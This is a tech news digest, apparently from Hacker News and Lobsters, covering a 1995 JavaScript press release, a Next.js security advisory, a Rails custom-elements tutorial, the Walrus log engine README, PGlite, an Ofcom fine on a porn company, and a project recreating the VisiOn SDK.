"JavaScript is a great way to get cross-platform scriptable access to databases and move the resulting data into Macromedia Shockwave, where it can be rendered, animated and made into live interactive multimedia for the Internet. JavaScript is also a promising core technology for the new multimedia publishing tool that Macromedia is building."
Bud Colligan
President and CEO
Macromedia
"The creation of a general, standard scripting language for Java development will accelerate adoption of this new, exciting technology for delivering dynamic, live content to the consumer. Metrowerks will support JavaScript as part of our effort to deliver tools for Java as the programming platform of choice for new Internet development."
Greg Galanos
President and CEO
Metrowerks, Inc.
"Paper Software plans to use JavaScript as the glue which lets our development partners couple Java, plug-ins, and Paper's multi-dimensional VRML user interfaces within a distributed, online application."
Mike McCue
Chief Executive Officer
Paper Software
"JavaScript is a perfect complement to the software Precept is developing to let the Internet and corporate Intranets effectively handle real-time multimedia traffic. By serving as a means to integrate our products into web solutions, JavaScript will enable a wide range of web-based software to take advantage of real-time audio and video."
Judy Estrin
Precept Software
"SCO looks forward to supporting the JavaScript language on both our OpenServer and UnixWare product lines. JavaScript will enable developers to create substantially more stimulating and interactive web-based applications than ever before, giving them the edge they need to compete for the attention of the increasingly sophisticated population of Internet users."
Richard Treadway
Vice President, Layered Products
SCO
"JavaScript is an exact match for Silicon Graphics suite of content creation and application development tools. This combination will benefit the industry by enabling the development of a richer set of interactive applications."
Tom Jermoluk
President and COO
Silicon Graphics
"Spider will integrate open and emerging Internet standards such as JavaScript into our product offering. Spider is committed to providing the most advanced solution for visual development and high performance deployment of commercial Web/database applications."
Zack Rinat
President and CEO
Spider Technologies
"The Java and JavaScript languages will serve an important role in allowing Internet applications to take advantage of enterprise client/server computing. Sybase will enable our customers to utilize these languages as one of several ways to provide Internet access to the entire Sybase architecture in a high performance, customer-centric, safe environment."
Mitchell Kertzman
Executive Vice President and CEO
Sybase's Powersoft Division
"Java is tremendously interesting to Verity as a powerful tool to provide dynamic display capabilities and client-side manipulation of results from our Search and Agent platforms. Configurability is a key strength of Verity servers, and the availability of JavaScript provides an ideal tool for non-programmers to harness the power of Java objects to customize the look and feel of their Verity applications."
Steve Zocchi
Director, Internet Marketing
Verity
"The client-server, multi-vendor, cross-platform nature of JavaScript is a natural fit with the Vermeer FrontPage web authoring system. Tracking innovative, enabling Web technologies is an important priority for Vermeer, and we are moving quickly to incorporate the JavaScript language into Front Page and future products."
John R. Mandle
Chief Executive Officer
Vermeer Technologies

Company Contacts:

America Online, Inc. Pam Mcgraw: (703) 556-3746
Apple Computer, Inc. Nancy Morrison: (408) 862-6200
Architext Software Mike Brogan/Roederer-Johnson: (415) 802-1850
AT&T; Mary Whelan: (908) 658-6000
Borland International Bill Jordan: (408) 431-4721
Brio Technology, Inc. Yorgen Edholm: yhe@brio.com
Computer Associates, Inc. Yogesh Gupta: (516) 342-4045
Digital Equipment Corporation Ethel Kaiden: (508) 486-2814
Hewlett-Packard Company Bill Hodges: (408) 447-7041
Iconovex Corporation Robert Griggs: (800) 943-0292
Illustra Information Technologies, Inc. Sandra Bateman: (510) 873-6209
Informix Software, Inc. Cecilia Denny: (415) 926-6420
Intuit, Inc. Sheryl Ross: (415) 329-3569
Macromedia Miles Walsh: (415) 252-2000
Metrowerks, Inc. Greg Galanos: gpg@austin.metrowerks.com
Novell, Inc. Christine Hughes: (408) 577-7453
Oracle Corporation Mark Benioff: (415) 506-7000
Paper Software, Inc. Mike Mccue: (914) 679-2440
Precept Software, Inc. Judy Estrin: (408) 446-7600
RAD Technologies, Inc. Jeff Morgan: jmorgan@rad.com
The Santa Cruz Operation, Inc. Marty Picco: (408) 425-7222
Silicon Graphics, Inc. Virginia Henderson: (415) 933-1306
Spider Technologies Diana Jovin: (415) 969-6128
Sybase, Inc. Robert Manetta: (510) 922-5742
Verity, Inc. Marguerite Padovani: (415) 960-7724
Vermeer Technologies, Inc. Ed Cuoco: (617) 576-1700x130


NextJS Security Vulnerability

Hacker News
nextjs.org
2025-12-04 11:14:04
Comments...
Original Article

A critical vulnerability has been identified in the React Server Components (RSC) protocol. The issue is rated CVSS 10.0 and can allow remote code execution when processing attacker-controlled requests in unpatched environments.

This vulnerability originates in the upstream React implementation ( CVE-2025-55182 ). This advisory ( CVE-2025-66478 ) tracks the downstream impact on Next.js applications using the App Router.

Impact

The vulnerable RSC protocol allowed untrusted inputs to influence server-side execution behavior. Under specific conditions, an attacker could craft requests that trigger unintended server execution paths. This can result in remote code execution in unpatched environments.

Affected Next.js Versions

Applications using React Server Components with the App Router are affected when running:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 and later canary releases

Next.js 13.x, Next.js 14.x stable, Pages Router applications, and the Edge Runtime are not affected.

Fixed Versions

The vulnerability is fully resolved in the following patched Next.js releases:

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 15.3.6
  • 15.4.8
  • 15.5.7
  • 16.0.7

These versions include the hardened React Server Components implementation.

Required Action

All users should upgrade to the latest patched version in their release line.
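For example, one way to apply the fix (a sketch, not the advisory's exact instructions) is to pin a patched release from the list above in package.json and reinstall:

{
  "dependencies": {
    "next": "15.5.7"
  }
}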

If you are on Next.js 14.3.0-canary.77 or a later canary release, downgrade to the latest stable 14.x release.

There is no configuration option to disable the vulnerable code path.

Discovery

Thank you to Lachlan Davidson for discovering and responsibly disclosing this vulnerability. We are intentionally limiting technical detail in this advisory to protect developers who have not yet upgraded.


Building optimistic UI in Rails (and learn custom elements)

Hacker News
railsdesigner.com
2025-12-04 11:03:16
Comments...
Original Article

Custom elements are one of those web platform features that sound complicated but turn out to be surprisingly simple. If you have used Hotwire in Rails, you have already used them. Both <turbo-frame> and <turbo-stream> are custom elements. They are just HTML tags with JavaScript behavior attached.

This article walks through what custom elements are, how they compare to Stimulus controllers and how to build them yourself! Starting with a simple counter and ending with an optimistic form that updates instantly without waiting for the server . 🤯

The code is available on GitHub.

What are custom elements?

Custom elements let you define your own HTML tags with custom behavior. They fall under the Web Components umbrella, alongside Shadow DOM (encapsulated styling and markup) and templates (reusable HTML fragments), though each can be used independently. To use custom elements, just define a class, register it with the browser, and use your new tag anywhere (Shadow DOM or templates not required).

Here is the simplest possible custom element:

class HelloWorld extends HTMLElement {
  connectedCallback() {
    this.textContent = "Hello from a custom element 👋"
  }
}

customElements.define("hello-world", HelloWorld)

Now you can use <hello-world></hello-world> in your HTML and it will display the message. The connectedCallback runs when the element is added to the page, similar to Stimulus’s connect() method. There is also a disconnectedCallback, the counterpart to Stimulus’s disconnect(), used for cleanup such as removing event listeners.
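For example, a hypothetical <tick-tock> element (not from the article) that sets up a timer on connect and tears it down on disconnect:

class TickTock extends HTMLElement {
  connectedCallback() {
    // Start a timer when the element enters the page
    this.timer = setInterval(() => {
      this.textContent = new Date().toLocaleTimeString()
    }, 1000)
  }

  disconnectedCallback() {
    // Clean up when the element is removed, like Stimulus's disconnect()
    clearInterval(this.timer)
  }
}

customElements.define("tick-tock", TickTock)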

Custom element names must contain a hyphen. This prevents conflicts with future HTML elements. So <hello-world> works, but <helloworld> does not.

Attributes and properties

Custom elements can read attributes just like regular HTML elements:

class GreetUser extends HTMLElement {
  connectedCallback() {
    const name = this.getAttribute("name") || "stranger"

    this.textContent = `Hello, ${name}!`
  }
}

customElements.define("greet-user", GreetUser)

Use it like this:

<greet-user name="Cam"></greet-user>

To react to attribute changes, use attributeChangedCallback:

class GreetUser extends HTMLElement {
  static observedAttributes = ["name"]

  connectedCallback() {
    this.#render()
  }

  attributeChangedCallback(name, oldValue, newValue) {
    this.#render()
  }

  // private

  #render() {
    const name = this.getAttribute("name") || "stranger"

    this.textContent = `Hello, ${name}!`
  }
}

The observedAttributes array tells the browser which attributes to watch. Without it, attributeChangedCallback never fires.
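With that in place, updating the attribute from anywhere re-renders the element (the name "Sam" here is just an example):

document.querySelector("greet-user").setAttribute("name", "Sam")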

The is attribute

You can extend built-in HTML elements using the is attribute. For example, extending a button:

class FancyButton extends HTMLButtonElement {
  connectedCallback() {
    this.classList.add("fancy")
  }
}

customElements.define("fancy-button", FancyButton, { extends: "button" })

Then use it like:

<button is="fancy-button">Click me</button>

This keeps all the built-in button behavior while adding your custom features (simply adding the fancy class in the example above). However, Safari does not support this feature, so I stick to autonomous custom elements (the hyphenated tags) for better compatibility.

Custom elements vs Stimulus

If you have used Stimulus, custom elements will feel familiar. Here is how they compare:

Feature          | Stimulus                 | Custom Element
Lifecycle        | connect() / disconnect() | connectedCallback() / disconnectedCallback()
Finding elements | targets                  | querySelector() / direct children
State            | values                   | attributes + properties
Events           | action attributes        | addEventListener()
Framework        | Requires Stimulus        | Browser-native

Stimulus is great for connecting behavior to existing HTML. Custom elements are better when you want a reusable component that works anywhere. They are also simpler when you do not need Stimulus’s conventions.

The main difference is how you find elements. Stimulus uses targets:

<div data-controller="counter">
  <span data-counter-target="count">0</span>

  <button data-action="click->counter#increment">+</button>
</div>

Custom elements use standard DOM/query methods (see example below):

<click-counter>
  <span class="count">0</span>

  <button>+</button>
</click-counter>

Custom elements feel more like writing vanilla JavaScript. Stimulus is more convention-based, which can be confusing at first.

In the end it is all a regular JavaScript class. I’ve explored these extensively in the book JavaScript for Rails Developers. 💡

Building a simple counter

Time to build something. Start with a counter that increments when clicked:

// app/javascript/components/click_counter.js
class ClickCounter extends HTMLElement {
  connectedCallback() {
    this.count = 0

    this.addEventListener("click", () => this.#increment())
  }

  #increment() {
    this.count++

    this.querySelector("span").textContent = this.count
  }
}

customElements.define("click-counter", ClickCounter)

Import it in your application JavaScript:

// app/javascript/application.js
import "@hotwired/turbo-rails"
import "controllers"

import "components/click_counter"

Configure importmap to find the new directory:

# config/importmap.rb
pin_all_from "app/javascript/controllers", under: "controllers"

pin_all_from "app/javascript/components", under: "components"

Now use it in your views:

<click-counter>
  <button>Clicked <span>0</span> times</button>
</click-counter>

Click the button and watch the counter increment. Simple! 😊

Building an optimistic form

Now for something a bit more useful. Build a form that updates instantly without waiting for the server. If the save fails, show an error. If it succeeds, keep the optimistic UI.

It will look like this:

See how the message gets appended immediately and then (notice the blue Turbo progress bar) gets replaced with the server rendered version.

The HTML looks like this:

<optimistic-form>
  <form action="<%= messages_path %>" method="post">
    <%= hidden_field_tag :authenticity_token, form_authenticity_token %>

    <%= text_area_tag "message[content]", "", placeholder: "Write a message…", required: true %>

    <%= submit_tag "Send" %>
  </form>

  <template response>
    <%= render Message.new(content: "", created_at: Time.current) %>
  </template>
</optimistic-form>

The <template response> tag (indeed also part of the Web Components standard) holds the display HTML for new messages. When the form submits, the custom element renders this template with the form values and appends it to the list. The form still submits normally to Rails.

Start with the basic structure:

// app/javascript/components/optimistic_form.js
class OptimisticForm extends HTMLElement {
  connectedCallback() {
    this.form = this.querySelector("form")
    this.template = this.querySelector("template[response]")
    this.target = document.querySelector("#messages")

    this.form.addEventListener("submit", () => this.#submit())
  }

  #submit() {
    if (!this.form.checkValidity()) return

    const formData = new FormData(this.form)
    const optimisticElement = this.#render(formData)

    this.target.append(optimisticElement)
  }
}

customElements.define("optimistic-form", OptimisticForm)

The submit method checks form validity first using the browser’s built-in validation. If the form is invalid, let the browser show its validation messages. Otherwise render the optimistic UI and let the form submit normally.

Getting optimistic

Extract the form data and populate the template:

#render(formData) {
  const element = this.template.content.cloneNode(true).firstElementChild

  element.id = "optimistic-message"

  for (const [name, value] of formData.entries()) {
    const field = element.querySelector(`[data-field="${name}"]`)

    if (field) field.textContent = value
  }

  return element
}

The cloneNode(true) call creates a deep copy of the template content. Loop through the form data and update any element with a matching data-field attribute. This is why the partial has data-field="message[content]" on the message display.
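The message partial itself is not shown in the article, but for the lookup to work it might look something like this (a hypothetical sketch; the only requirement is the data-field attribute on the element that displays the content):

<%# app/views/messages/_message.html.erb (hypothetical shape) %>
<div id="<%= dom_id(message) %>">
  <p data-field="message[content]"><%= message.content %></p>
</div>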

The optimistic element appears in the list immediately, then the form submits to Rails.

The Turbo Stream does not append the message, but replaces the “optimistic message” with the real one from the database:

<%# app/views/messages/create.turbo_stream.erb %>
<%= turbo_stream.replace "optimistic-message", @message %>

Since both the optimistic template and the message partial render the same HTML, the replacement is seamless. The user sees the message appear instantly, then it gets replaced with the real version (with the correct ID, timestamp, etc.) a moment later.

Here is the full implementation:

// app/javascript/components/optimistic_form.js
class OptimisticForm extends HTMLElement {
  connectedCallback() {
    this.form = this.querySelector("form")
    this.template = this.querySelector("template[response]")
    this.target = document.querySelector("#messages")

    this.form.addEventListener("submit", () => this.#submit())
    this.form.addEventListener("turbo:submit-end", () => this.#reset())
  }

  // private

  #submit() {
    if (!this.form.checkValidity()) return

    const formData = new FormData(this.form)
    const optimisticElement = this.#render(formData)

    this.target.append(optimisticElement)
  }

  #render(formData) {
    const element = this.template.content.cloneNode(true).firstElementChild

    element.id = "optimistic-message"

    for (const [name, value] of formData.entries()) {
      const field = element.querySelector(`[data-field="${name}"]`)

      if (field) field.textContent = value
    }

    return element
  }

  #reset() {
    this.form.reset()
  }
}

customElements.define("optimistic-form", OptimisticForm)

Do not forget to import it:

// app/javascript/application.js
import "components/optimistic_form"

Now when you submit the form, the message appears instantly in the list. The form submits to Rails, which responds with a Turbo Stream (I added sleep to mimic a slow response) that replaces the optimistic message with the real one. If the save fails, Rails can show an error message normally.
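If you want the optimistic element to disappear on failure rather than linger, one option (a sketch, not part of the article's implementation) is to check Turbo's turbo:submit-end event, whose detail includes a success flag:

// Sketch: inside connectedCallback, alongside the existing listeners.
// Removes the optimistic element when the submission fails.
this.form.addEventListener("turbo:submit-end", (event) => {
  if (!event.detail.success) {
    document.getElementById("optimistic-message")?.remove()
  }
})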

Cool, right? I’ve used this technique successfully with a client before, and many months later it still holds up nicely.


This pattern can work great for any form where you want instant feedback. Like chat messages, comments or todos. The new item appears immediately. No loading spinners, no waiting.

The key is that the partial lives right within the template element. You are not duplicating it in JavaScript. Change the partial and the optimistic UI updates automatically.

Custom elements make this pattern reusable. Drop <optimistic-form> anywhere in your app. It works with any form and any partial (in the client project mentioned above, I stubbed the partial with a more advanced “stand-in” model instance).

Yet another tool in your Rails toolkit. Did this inspire you to use custom elements more too? Let me know below! ❤️

walrus (High Performance distributed log streaming engine)

Lobsters
github.com
2025-12-04 10:58:11
Comments...
Original Article

walrus

Walrus: A Distributed Message Streaming Engine


Walrus is a distributed message streaming platform built on a high-performance log storage engine. It provides fault-tolerant streaming with automatic leadership rotation, segment-based partitioning, and Raft consensus for metadata coordination.

Walrus Demo

Key Features:

  • Automatic load balancing via segment-based leadership rotation
  • Fault tolerance through Raft consensus (3+ nodes)
  • Simple client protocol (connect to any node, auto-forwarding)
  • Sealed segments for historical reads from any replica
  • High-performance storage with io_uring on Linux

Architecture

System Overview

Walrus Architecture

Producers and consumers connect to any node (or via load balancer). The cluster automatically routes requests to the appropriate leader and manages segment rollovers for load distribution.

Node Internals

Walrus Node Architecture

Each node contains four key components: Node Controller (routing and lease management), Raft Engine (consensus for metadata), Cluster Metadata (replicated state), and Bucket Storage (Walrus engine with write fencing).

Core Components

Node Controller

  • Routes client requests to appropriate segment leaders
  • Manages write leases (synced from cluster metadata every 100ms)
  • Tracks logical offsets for rollover detection
  • Forwards operations to remote leaders when needed

Raft Engine (Octopii)

  • Maintains Raft consensus for metadata changes only (not data!)
  • Handles leader election and log replication
  • Syncs metadata across all nodes via AppendEntries RPCs

Cluster Metadata (Raft State Machine)

  • Stores topic → segment → leader mappings
  • Tracks sealed segments and their entry counts
  • Maintains node addresses for routing
  • Replicated identically across all nodes

Storage Engine

  • Wraps Walrus engine with lease-based write fencing
  • Only accepts writes if node holds lease for that segment
  • Stores actual data in WAL files on disk
  • Serves reads from any segment (sealed or active)

Quick Start

Running a 3-Node Cluster

cd distributed-walrus

make cluster-bootstrap

# Interact via CLI
cargo run --bin walrus-cli -- --addr 127.0.0.1:9091

# In the CLI:

# create a topic named 'logs'
> REGISTER logs

# produce a message to the topic
> PUT logs "hello world"

# consume message from topic
> GET logs

# get the segment states of the topic
> STATE logs

# get cluster state
> METRICS

Client Protocol

Simple length-prefixed text protocol over TCP:

Wire format:
  [4 bytes: length (little-endian)] [UTF-8 command]

Commands:
  REGISTER <topic>       → Create topic if missing
  PUT <topic> <payload>  → Append to topic
  GET <topic>            → Read next entry (shared cursor)
  STATE <topic>          → Get topic metadata (JSON)
  METRICS                → Get Raft metrics (JSON)

Responses:
  OK [payload]           → Success
  EMPTY                  → No data available (GET only)
  ERR <message>          → Error

See distributed-walrus/docs/cli.md for detailed CLI usage.
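To illustrate the framing (a hypothetical client sketch in Node.js; the repo itself is Rust and ships its own CLI), sending a command over TCP might look like this, using the 127.0.0.1:9091 address from the quick start:

// Frame a command as [4-byte little-endian length][UTF-8 command]
// and send it to a node over TCP.
const net = require("net")

function sendCommand(socket, command) {
  const body = Buffer.from(command, "utf-8")
  const header = Buffer.alloc(4)
  header.writeUInt32LE(body.length, 0)
  socket.write(Buffer.concat([header, body]))
}

const socket = net.createConnection(9091, "127.0.0.1", () => {
  sendCommand(socket, "REGISTER logs")
  sendCommand(socket, 'PUT logs "hello world"')
})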

Key Features

Segment-Based Sharding

  • Topics split into segments (~1M entries each by default)
  • Each segment has a leader node that handles writes
  • Leadership rotates round-robin on segment rollover
  • Automatic load distribution across cluster

Lease-Based Write Fencing

  • Only the leader for a segment can write to it
  • Leases derived from Raft-replicated metadata
  • 100ms sync loop ensures lease consistency
  • Prevents split-brain writes during leadership changes

Sealed Segment Reads

  • Old segments "sealed" when rolled over
  • Original leader retains sealed data for reads
  • Reads can be served from any replica with the data
  • No data movement required during rollover

Automatic Rollover

  • Monitor loop (10s) checks segment sizes
  • Triggers rollover when threshold exceeded
  • Proposes metadata change via Raft
  • Leader transfer happens automatically

Configuration

CLI Flags

Flag                  | Default     | Description
--node-id             | (required)  | Unique node identifier
--data-dir            | ./data      | Root directory for storage
--raft-port           | 6000        | Raft/Internal RPC port
--raft-host           | 127.0.0.1   | Raft bind address
--raft-advertise-host | (raft-host) | Advertised Raft address
--client-port         | 8080        | Client TCP port
--client-host         | 127.0.0.1   | Client bind address
--join                | -           | Address of existing node to join

Environment Variables

Variable                   | Default | Description
WALRUS_MAX_SEGMENT_ENTRIES | 1000000 | Entries before rollover
WALRUS_MONITOR_CHECK_MS    | 10000   | Monitor loop interval (ms)
WALRUS_DISABLE_IO_URING    | -       | Use mmap instead of io_uring
RUST_LOG                   | info    | Log level (debug, info, warn)

Testing

Comprehensive test suite included:

cd distributed-walrus

# Run all tests
make test

# Individual tests
make cluster-test-logs         # Basic smoke test
make cluster-test-rollover     # Segment rollover
make cluster-test-resilience   # Node failure recovery
make cluster-test-recovery     # Cluster restart persistence
make cluster-test-stress       # Concurrent writes
make cluster-test-multi-topic  # Multiple topics

Performance

  • Write throughput : Single writer per segment (lease-based)
  • Read throughput : Scales with replicas (sealed segments)
  • Latency : ~1-2 RTT for forwarded ops + storage latency
  • Consensus overhead : Metadata only (not data path)
  • Segment rollover : ~1M entries default (~100MB depending on payload size)

Correctness

Walrus includes a formal TLA+ specification of the distributed data plane that models segment-based sharding, lease-based write fencing, and cursor advancement across sealed segments.

Specification: distributed-walrus/spec/DistributedWalrus.tla

Verified Invariants

  • Domain Consistency : Topic metadata, WAL entries, and reader cursors stay synchronized
  • Single Writer per Segment : Only the designated leader can write to each segment
  • No Writes Past Open Segment : Closed segments remain immutable after rollover
  • Sealed Counts Stable : Entry counts for sealed segments match actual WAL contents
  • Read Cursor Bounds : Cursors never exceed segment boundaries or entry counts
  • Sequential Write Order : Entries within each segment maintain strict ordering

Liveness Properties

  • Rollover Progress : Segments exceeding the entry threshold eventually roll over
  • Read Progress : Available entries eventually get consumed by readers

The specification abstracts Raft consensus as a single authoritative metadata source and models Walrus storage as per-segment entry sequences. Model checking with TLC verifies correctness under concurrent operations.

Storage Engine Benchmarks

The underlying storage engine delivers exceptional performance:

Walrus vs RocksDB vs Kafka - No Fsync

System  | Avg Throughput (writes/s) | Avg Bandwidth (MB/s) | Max Throughput (writes/s) | Max Bandwidth (MB/s)
Walrus  | 1,205,762                 | 876.22               | 1,593,984                 | 1,158.62
Kafka   | 1,112,120                 | 808.33               | 1,424,073                 | 1,035.74
RocksDB | 432,821                   | 314.53               | 1,000,000                 | 726.53

Walrus vs RocksDB vs Kafka - With Fsync

System  | Avg Throughput (writes/s) | Avg Bandwidth (MB/s) | Max Throughput (writes/s) | Max Bandwidth (MB/s)
RocksDB | 5,222                     | 3.79                 | 10,486                    | 7.63
Walrus  | 4,980                     | 3.60                 | 11,389                    | 8.19
Kafka   | 4,921                     | 3.57                 | 11,224                    | 8.34

Benchmarks compare a single Kafka broker (no replication, no networking overhead) and RocksDB's WAL against the legacy append_for_topic() endpoint using pwrite() syscalls (no io_uring batching).


Using Walrus as a Library

The core Walrus storage engine is also available as a standalone Rust library for embedded use cases:


[dependencies]
walrus-rust = "0.2.0"
use walrus_rust::{Walrus, ReadConsistency};

// Create a new WAL instance
let wal = Walrus::new()?;

// Write data to a topic
wal.append_for_topic("my-topic", b"Hello, Walrus!")?;

// Read data from the topic
if let Some(entry) = wal.read_next("my-topic", true)? {
    println!("Read: {:?}", String::from_utf8_lossy(&entry.data));
}

See the standalone library documentation for single node usage, configuration options, and API reference.

Contributing

We welcome patches; check CONTRIBUTING.md for the workflow.

License

This project is licensed under the MIT License; see the LICENSE file for details.

Changelog

Version 0.3.0

  • New : Distributed message streaming platform with Raft consensus
  • New : Segment-based leadership rotation and load balancing
  • New : Automatic rollover and lease-based write fencing
  • New : TCP client protocol with simple text commands
  • New : Interactive CLI for cluster interaction
  • New : Comprehensive test suite for distributed scenarios

Version 0.2.0

  • New : Atomic batch write operations ( batch_append_for_topic )
  • New : Batch read operations ( batch_read_for_topic )
  • New : io_uring support for batch operations on Linux
  • New : Dual storage backends (FD backend with pread/pwrite, mmap backend)
  • New : Namespace isolation via _for_key constructors
  • New : FsyncSchedule::SyncEach and FsyncSchedule::NoFsync modes
  • Improved : Comprehensive documentation with architecture and design docs
  • Improved : Enhanced benchmarking suite with batch operation benchmarks
  • Fixed : Tail read offset tracking in concurrent scenarios

Version 0.1.0

  • Initial release
  • Core WAL functionality
  • Topic-based organization
  • Configurable consistency modes
  • Comprehensive benchmark suite
  • Memory-mapped I/O implementation
  • Persistent read offset tracking

PGlite – Embeddable Postgres

Hacker News
pglite.dev
2025-12-04 10:52:42
Comments...
Original Article

Embeddable Postgres

Run a full Postgres database locally in WASM with reactivity and live sync.

Lightweight

A complete WASM build of Postgres that's under 3MB Gzipped.

Extendable

Dynamic extension loading mechanism, including support for pgvector.

Reactive

Built in support for data loading, synchronisation and live query primitives.
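In practice, that is a few lines of JavaScript (based on PGlite's published quick start; the package name on npm is @electric-sql/pglite):

import { PGlite } from "@electric-sql/pglite"

// Create an in-memory Postgres instance and run a query
const db = new PGlite()
const result = await db.query("SELECT 'Hello, PGlite!' AS message")
console.log(result.rows) // [ { message: 'Hello, PGlite!' } ]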

Experience PGlite with database.build

Create and publish a Postgres database using AI, built on PGlite by Supabase.


Try PGlite Now

This is a full PGlite Postgres running in your browser.
It even includes pgvector !

Try more extensions in the playground

Porn company fined £1M over inadequate age checks (UK)

Hacker News
www.bbc.co.uk
2025-12-04 10:47:21
Comments...
Original Article

Ofcom has told the BBC it has never heard from a porn company it has fined £1m for failing to comply with the UK Online Safety Act.

It said it had been emailing AVS Group Ltd since it launched its investigation in July, but had not had a response at any point - so the firm had been fined an extra £50,000.

The Act makes it a legal requirement for websites that host pornographic material to put in place what the regulator determines to be "highly effective age assurance" to prevent children from being able to easily access explicit content.

Ofcom said AVS must now implement highly effective age assurance within 72 hours or face an additional penalty of £1,000 a day.

In addition to the AVS fine, Ofcom also announced that one "major social media company" was going through compliance remediation with its enforcement team.

The regulator has not named the platform but says there may be formal action if it does not see sufficient improvement soon.

Ofcom said the fine showed the "tide on online safety" was beginning to turn.

"This year has seen important changes for people, with new measures across many sites and apps now better protecting children from harmful content," said Oliver Griffiths, Ofcom's online safety group director.

"But we need to see much more from tech companies next year and we'll use our full powers if they fall short," he added.

Ofcom has already started issuing fines to some companies for not implementing proper age verification, including deepfake "nudify" applications .

However, online message board 4Chan has so far refused to comply with a £20,000 fine issued by Ofcom over the summer.

The Online Safety Act is being implemented in phases, and is intended to prevent past practices which Ofcom described as online platforms being "unregulated, unaccountable and often unwilling to prioritise people's safety over profits".

Tougher age checks for porn websites were introduced in July, though some people have pointed out these could be easily avoided with a virtual private network (VPN), which reroutes internet traffic.

In October, Pornhub's parent company told BBC News it had seen a 77% drop in UK visitors since the age checks had come in.

Baroness Beeban Kidron, founder of 5Rights Foundation, told the Today programme the fines were "nothing" to tech firms.

"Business disruption is everything," she said.

"Unless we're prepared to use the law, they're not really doing what Parliament asked them to do.

"We need a whole different attitude about the level of intensity and robustness from the regulator to say - we've got the law and we're using it."

The BBC has contacted a company called TubeCorporate, the adult content publishing platform behind the AVS Group Ltd sites, for a response.

The address the firm uses is in the Central American country of Belize, and appears to be the registered address of a large number of companies, although they do not have physical offices there.

Also introduced this year were tougher guidelines on ensuring the internet was safer for women and girls , with Ofcom vowing to name and shame platforms that did not comply.

Critics say the Act needs to be toughened to make the internet safer, particularly for women and girls.

On recreating the lost SDK for a 42-year-old operating system: VisiCorp Visi On

Lobsters
git.sr.ht
2025-12-04 10:42:13
Comments...
Original Article

# On recreating the lost SDK for a 42-year-old operating system: VisiCorp Visi On

Back in 1983, the office software giant VisiCorp released a graphical multitasking operating system for the IBM PC called VisiOn (or Visi On, or Visi-On; it was before the Internet, so anything goes). It was an "open system", so anyone could make programs for it. Well, if they owned an expensive VAX computer and were prepared to shell out $7,000 on the Software Development Kit.

VisiOn was released earlier than Microsoft Windows, Digital Research GEM, or the Apple Macintosh. Its COMDEX demo even predates the announcement of the Apple Lisa. But being first doesn't mean getting things right, so this VisiOn of the future did not win the market. Not a single third-party program was released for the system. No one preserved the SDK for the system. The technical documentation roughly amounts to three terse magazine articles and a single Usenet post. Heck, even copies of the operating system itself are hard to come by.

Despite its low popularity, VisiOn is historically important. It influenced Microsoft's decisions about Windows, and it is a lesson about failing. So, I thought it would be nice to recreate the SDK for it, Homebrew-style. How difficult could it be, right?!

It took me a month of working 1-2 hours a day to produce a specification that allowed Atsuko to implement a clean-room homebrew application for VisiOn that is capable of bitmap display, menus and mouse handling.

If you're wondering what it felt like: this project is the largest "Sudoku puzzle" I have ever tried to solve. In this note, I have tried to explain the process of solving this puzzle, as well as noteworthy things about VisiOn and its internals. But, first things first...

# The first-ever third-party application for VisiOn

Pyramid Game is a simple patience card game that demonstrates the basics of application development for VisiOn. It comes with an installer and features loadable fonts, bitmaps, clickable areas ("buttons"), and a menu system.

You now can download the floppy image and the distribution files . Obviously, you will need an installed VisiOn system to run it. The rules of the game can be found on Wikipedia .

The source code is available in its own repo .

The claim of Pyramid being "the first-ever" third-party application is a bit strong. VisiOn was an "open system", and so it is theoretically possible someone bought a VisiOn ToolKit and made third-party applications for VisiOn. But even if they did, they never published or sold them. So, Pyramid is the first-ever published third-party application for VisiOn.

# Target audience of this note

This note is aimed at technically inclined readers with software engineering and coding background who want to learn more about vintage operating systems and reverse engineering. I'll try to keep the explanations simple at the expense of obscuring some of the technical details; if you want the details, please check out the verbose notes and the test application . I hope to document the operating system at a later date.

This note is quite long. Feel free to scroll to a part that interests you and read from there.

Personally, I find this project fascinating in terms of solarpunk and permacomputing. Imagine: you find an ancient device (42 years is ancient for computers, right?!), an artefact of a previous era, without any documentation. You have all the modern knowledge, and you want to make this mysterious device do things it was not supposed to do originally. Of course, with Visi On it's not quite the same; it runs on the IBM PC, a very well-documented and researched hardware platform.

If you have any feedback or comments, please leave them in the Mastodon thread or in the sr.ht ToDo project . Questions are fine, too!

# A tour of VisiOn quirks

VisiOn was made before many common user interface conventions were invented. It targeted a computer with a tiny resolution of 640x200 pixels, so its authors decided not to use any icons. Therefore, VisiOn looks a bit alien. At the same time, it was made by people who knew what they were doing, and it is mostly coherent in its interface decisions.

Here is a copy of the OS tour I gave on Mastodon . I did not insert the clips as inline GIFs because the animations cannot be paused and are very distracting.

Clip: boot process

One immediately obvious thing here is the "hourglass" icon. Some believe that it might have been the first OS to use the hourglass mouse icon, but no, Xerox and InterLisp had it earlier. Apple Lisa, a contemporary, also had a similar mouse cursor.

The main application of the Visi On Application Manager is called "Services". The biggest diference between "Services" and other applications is that its "exit" button shuts down the whole OS.

You can see the screen has a System Menu at the bottom. The system menu is here to manage windows: make them FULL screen, re-FRAME them, CLOSE into an on-desktop button (we'd say "minimise" today) or OPEN them back. You cannot move the windows by their title bars. The system is very happy to beep at you, like it's a vintage PC game.

Clip: window management

VisiOn is a multi-tasking operating system, and it allows launching multiple instances of the same application. To differentiate between them, the user can input the window name during the application startup.

Clip: multiple windows of the same program

In VisiOn, the Tutorial and Help apps implement a simple hyper-text system based on the "button" primitive. The "button" is simply a clickable area on the screen. It highlights by reversing the background and foreground colour when the mouse hovers over the button.

The system uses left-click for most operations. The right click is needed for the "scroll" operation. The user can scroll the documents (if there's something that can be scrolled) and the menu. You can see that the application menu isn't always fully visible, right?

Clip: buttons and scroll

The application menu system in VisiOn is hierarchical. Some operations make the menu behave like a modal window would in Windows or Mac. It is common not to add a "cancel" button in the menu. Instead, the system button STOP is used to cancel the operation.

In other situations, the menu can be navigated back by using the hierarchical menu selector. In either case, the system is "verb" driven - you choose the action ("verb"), and then you choose where the action should apply. The biggest problem is probably that the menu system is inconsistent. Some menus have "back" or "cancel" options, and some don't. Some "verbs" are actually nouns - "Printing". Some verbs start with a capital letter - "Configure" - like they are nouns. Perhaps it is a sign of a menu element that doesn't require "an object". The "object" here is more "grammatical" than a software concept.

Clip: application menu bar

